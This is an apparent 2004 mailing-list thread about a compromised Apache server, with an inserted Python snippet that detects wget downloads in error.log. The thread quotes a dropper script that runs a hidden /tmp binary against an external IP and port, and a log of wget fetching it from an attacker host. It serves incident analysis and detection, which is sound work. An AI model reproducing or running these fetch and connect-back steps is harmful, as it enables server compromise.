Hi all,

I have found something under /tmp: .do and .do.sh

.do.sh -->
----
chmod 755 /tmp/.do
/tmp/.do 163.17.51.8 9090
-----

ls -l shows: wwwrun nogroup

I have found in /var/log/httpd/error.log:
----
--09:06:43-- http://218.234.171.84/manual/.x/rhs
=> `/tmp/.do'
Resolving 218.234.171.84... done.
Connecting to 218.234.171.84:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 435,444 [text/plain]

0K .......... .......... .......... .......... .......... 11% 44.21 KB/s
50K .......... .......... .......... .......... .......... 23% 131.93 KB/s
100K .......... .......... .......... .......... .......... 35% 123.76 KB/s
150K .......... .......... .......... .......... .......... 47% 153.37 KB/s
200K .......... .......... .......... .......... .......... 58% 137.36 KB/s
250K .......... .......... .......... .......... .......... 70% 150.15 KB/s
300K .......... .......... .......... .......... .......... 82% 373.13 KB/s
350K .......... .......... .......... .......... .......... 94% 144.09 KB/s
400K .......... .......... ..... 100% 90.46 KB/s

09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444]

connect error
-----

What's that? chkroot shows nothing, tripwire -"- ???

Gruss
Tibor
On Tue, Jan 13, 2004 at 01:54:18PM +0100, Mátyás Tibor wrote:
I have found in /var/log/httpd/error.log
--09:06:43-- http://218.234.171.84/manual/.x/rhs => `/tmp/.do'
Some CGI at your webserver did run wget to receive some file from 218.234.171.84 and save it on your disc as "/tmp/.do". wwwrun:nogroup are the standard user and group used for apache.

The file is still available from http://218.234.171.84/manual/.x/rhs. I don't want to execute it, but strings does list some information:

usage: %s <IP or hostname> <port>
(/tmp/.do 163.17.51.8 9090)
connect error
probably an error message printed by /tmp/.do.
The server at 218.234.171.84 identifies itself as Apache/1.3.9 (Old!)
--
Stefan Tichy
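Stefan's reading of the log (a CGI ran wget and dropped the file into /tmp) can be turned into a check over error.log. The following is an added example, not code from anyone in this thread; the log excerpt is constructed around the lines Tibor posted, and the `suspicious` heuristic (download landing in a temp directory or as a dot-file) is my own assumption about what is worth flagging.

```python
import re
from dataclasses import dataclass

# Constructed excerpt of an Apache error.log, modelled on the wget transcript
# quoted in the thread; URL, destination path and sizes are the ones from the post.
SAMPLE_ERROR_LOG = """\
[Tue Jan 13 09:06:40 2004] [error] Premature end of script headers: /cgi-bin/x.cgi
--09:06:43--  http://218.234.171.84/manual/.x/rhs
           => `/tmp/.do'
Resolving 218.234.171.84... done.
Connecting to 218.234.171.84:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 435,444 [text/plain]

09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444]

connect error
"""

START_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")          # --HH:MM:SS-- URL
DEST_RE = re.compile(r"=>\s*`([^']+)'")                         # => `path'
LEN_RE = re.compile(r"^Length:\s*([\d,]+)")                     # Length: 435,444
SAVED_RE = re.compile(r"^\d\d:\d\d:\d\d\s+\(.*?\)\s+-\s+`([^']+)'\s+saved\s+\[(\d+)/(\d+)\]")

@dataclass
class Download:
    started: str
    url: str
    dest: str = ""
    length: int = 0
    completed: bool = False

    @property
    def suspicious(self) -> bool:
        # Heuristic (assumption): a fetch into a world-writable dir or a dot-file.
        name = self.dest.rsplit("/", 1)[-1]
        return self.dest.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) or name.startswith(".")

def find_wget_downloads(log_text: str) -> list:
    """Reassemble wget transcripts that a CGI script leaked into error.log."""
    found, current = [], None
    for line in (ln.strip() for ln in log_text.splitlines()):
        if m := START_RE.match(line):
            current = Download(started=m.group(1), url=m.group(2))
            found.append(current)
            if d := DEST_RE.search(line):        # destination may share the first line
                current.dest = d.group(1)
        elif current is None:
            continue                             # no transcript in progress yet
        elif m := DEST_RE.search(line):
            current.dest = m.group(1)
        elif m := LEN_RE.match(line):
            current.length = int(m.group(1).replace(",", ""))
        elif m := SAVED_RE.match(line):
            current.dest = current.dest or m.group(1)
            current.completed = m.group(2) == m.group(3)   # received == expected bytes
    return found
```

Run it over the real error.log and then compare every flagged `dest` against the file's owner (here wwwrun:nogroup) and tripwire's baseline; a hit that tripwire does not know about is exactly the case in this thread.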
Hi, I found that server too, and some other "a-bit-worrying" stuff... For some reason my e-mail never reached this list.. wonder what happens this time.

Jask.a